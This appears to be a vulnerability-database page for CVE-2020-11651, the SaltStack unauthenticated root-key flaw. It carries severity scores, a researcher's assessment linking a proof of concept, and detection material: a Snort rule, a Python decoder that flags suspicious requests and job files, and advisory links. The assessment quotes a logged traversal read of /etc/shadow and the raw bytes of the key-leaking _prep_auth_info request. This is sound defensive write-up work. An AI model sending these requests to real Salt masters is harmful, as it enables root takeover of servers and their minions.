9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.975 High
EPSS
Percentile
100.0%
An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods without authentication. These methods can be used to retrieve user tokens from the salt master and/or run arbitrary commands on salt minions.
Recent assessments:
kevthehermit at May 01, 2020 8:19pm UTC reported:
For Salt Master before 2019.2.4 and 3000 before 3000.2 there is potential for RCE as root.
If a salt-master has its ZeroMQ port 4506 exposed to the public it is possible for an unauthenticated user to gain access to the root_key. With access to the root key it is possible to run a wide range of salt commands that include file read, file write and command execution. These commands can be executed on the salt-master and any minion that is connected.
This requires multiple socket requests: one to read the key and then additional requests to create jobs.
This POC was tested on SaltStack 2019.2.0.
As of the time of writing this assessment I have been able to create a functional exploit POC. The code can be found here – <https://github.com/kevthehermit/CVE-2020-11651>
The POC, and others I am sure will appear shortly, has the following functionality:
Read the root key
Read and Write files on the Salt Master
Construct a payload to gain full RCE as root on any connected Minion
This took several hours and is “easy” with the available information and access to a test instance. Details on the discovery process can be found on our blog – <https://immersivelabs.com/2020/05/06/hackers-are-currently-attacking-vulnerable-saltstack-systems/>
Patch to the latest versions and do not expose these ports to the external network.
Examine /var/cache/salt/master/jobs/ on the salt master for a listing of all jobs. The return.p file in these dirs will contain a detailed description of the request and the response. This data is serialised.
Immersive Labs have released a basic python script to parse all these job files – <https://immersivelabs.com/2020/05/06/how-to-lock-onto-the-hackers-targeting-saltstack-minions/>
# cat /var/cache/salt/master/jobs/65/6e5fa0837ca5f3d391c4d70d345ee25baed089b970a78a934709e80d083f95/7a5388b6a882_master/return.p
��return��fun�wheel.file_roots.read�jid�20200501195107225222�user�UNKNOWN�fun_args��../../../../etc/shadow��saltenv�base�_stamp�2020-05-01T19:51:07.229260�return��� /srv/salt/../../../../etc/shadow��root:!::0:::::
Snort Rule:
alert tcp $EXTERNAL_NET any -> $HOME_NET 4506 (msg:"Salt Stack root_key read attempt"; content:"_prep_auth_info"; sid:1000000; rev:1;)
On the wire it looks a bit like this, so a stronger rule can be created:
b'\x82\xa3enc\xa5clear\xa4load\x81\xa3cmd\xaf_prep_auth_info'
The following IPs have been observed sending malicious payloads. Other IPs have been seen scanning.
The following payloads have been observed:
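The two checks the assessment above points at (the `_prep_auth_info` frame on port 4506, and the job-cache record with an UNKNOWN user reading `../../../../etc/shadow`), as an added example that is not code from the assessment, Salt or Immersive Labs. It assumes only the frame and record shapes quoted above; the hand-written msgpack decoder, the function names and the sample bytes are the example's own.

```python
# Added example, not Salt's or Immersive Labs' code. Salt msgpack-serialises its
# port-4506 frames and its return.p job files, so one tiny decoder serves both checks.

def _decode(buf, pos):
    """Decode one msgpack object at buf[pos] (common small types only); return (obj, next_pos)."""
    b, pos = buf[pos], pos + 1
    if b <= 0x7F:                                   # positive fixint
        return b, pos
    if 0x80 <= b <= 0x8F:                           # fixmap
        return _collect(buf, pos, b & 0x0F, dict)
    if 0x90 <= b <= 0x9F:                           # fixarray
        return _collect(buf, pos, b & 0x0F, list)
    if 0xA0 <= b <= 0xBF:                           # fixstr
        n = b & 0x1F
        return buf[pos:pos + n].decode("utf-8"), pos + n
    if b in (0xC0, 0xC2, 0xC3):                     # nil / false / true
        return {0xC0: None, 0xC2: False, 0xC3: True}[b], pos
    if b == 0xD9:                                   # str 8
        n = buf[pos]
        return buf[pos + 1:pos + 1 + n].decode("utf-8"), pos + 1 + n
    raise ValueError("unsupported msgpack type byte 0x%02x (use the msgpack package)" % b)

def _collect(buf, pos, n, kind):
    items = []                                      # n values, or n key/value pairs
    for _ in range(n * (2 if kind is dict else 1)):
        v, pos = _decode(buf, pos)
        items.append(v)
    return (dict(zip(items[::2], items[1::2])) if kind is dict else items), pos

# Frame quoted in the assessment above: an unauthenticated "clear" request for
# _prep_auth_info, the call that hands back the master's root key.
WIRE_SAMPLE = b"\x82\xa3enc\xa5clear\xa4load\x81\xa3cmd\xaf_prep_auth_info"
# Constructed return.p record shaped like the quoted one (shadow body omitted).
JOB_SAMPLE = (b"\x81\xa6return\x85\xa3fun\xb5wheel.file_roots.read"
              b"\xa3jid\xb420200501195107225222\xa4user\xa7UNKNOWN"
              b"\xa8fun_args\x91\xb6../../../../etc/shadow\xa7saltenv\xa4base")

def classify_request(frame):
    """Name the key-leaking call in a 4506 frame, else None (clear-channel traffic alone is normal: minion key auth uses it)."""
    msg = _decode(bytes(frame), 0)[0]
    if isinstance(msg, dict) and msg.get("enc") == "clear":
        if (msg.get("load") or {}).get("cmd") == "_prep_auth_info":
            return "unauthenticated clear-channel call to _prep_auth_info"
    return None

def classify_job(return_p):
    """Why a cached job deserves a look: no authenticated user, or traversal in fun_args."""
    job = _decode(bytes(return_p), 0)[0].get("return") or {}
    args = [str(a) for a in job.get("fun_args") or []]
    reasons = []
    if job.get("user") == "UNKNOWN":
        reasons.append("job submitted without an authenticated user")
    if any(".." in a for a in args):
        reasons.append("path traversal in fun_args: " + ", ".join(args))
    return reasons
```

Run `classify_job` over every `return.p` under `/var/cache/salt/master/jobs/` to triage a master; the decoder deliberately covers only the small msgpack types seen in these records, so hand full-size job files to the msgpack package.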
hrbrmstr at May 04, 2020 10:40am UTC reported:
z0r1nga at April 30, 2020 11:57pm UTC reported:
wvu-r7 at May 04, 2020 7:36am UTC reported:
Assessed Attacker Value: 5
Assessed Attacker Value: 5
Assessed Attacker Value: 4
lists.opensuse.org/opensuse-security-announce/2020-04/msg00047.html
lists.opensuse.org/opensuse-security-announce/2020-07/msg00070.html
packetstormsecurity.com/files/157560/Saltstack-3000.1-Remote-Code-Execution.html
packetstormsecurity.com/files/157678/SaltStack-Salt-Master-Minion-Unauthenticated-Remote-Code-Execution.html
www.vmware.com/security/advisories/VMSA-2020-0009.html
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11651
docs.saltstack.com/en/latest/topics/releases/2019.2.4.html
github.com/saltstack/salt/blob/v3000.2_docs/doc/topics/releases/3000.2.rst
lists.debian.org/debian-lts-announce/2020/05/msg00027.html
tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-salt-2vx545AG
usn.ubuntu.com/4459-1
www.debian.org/security/2020/dsa-4676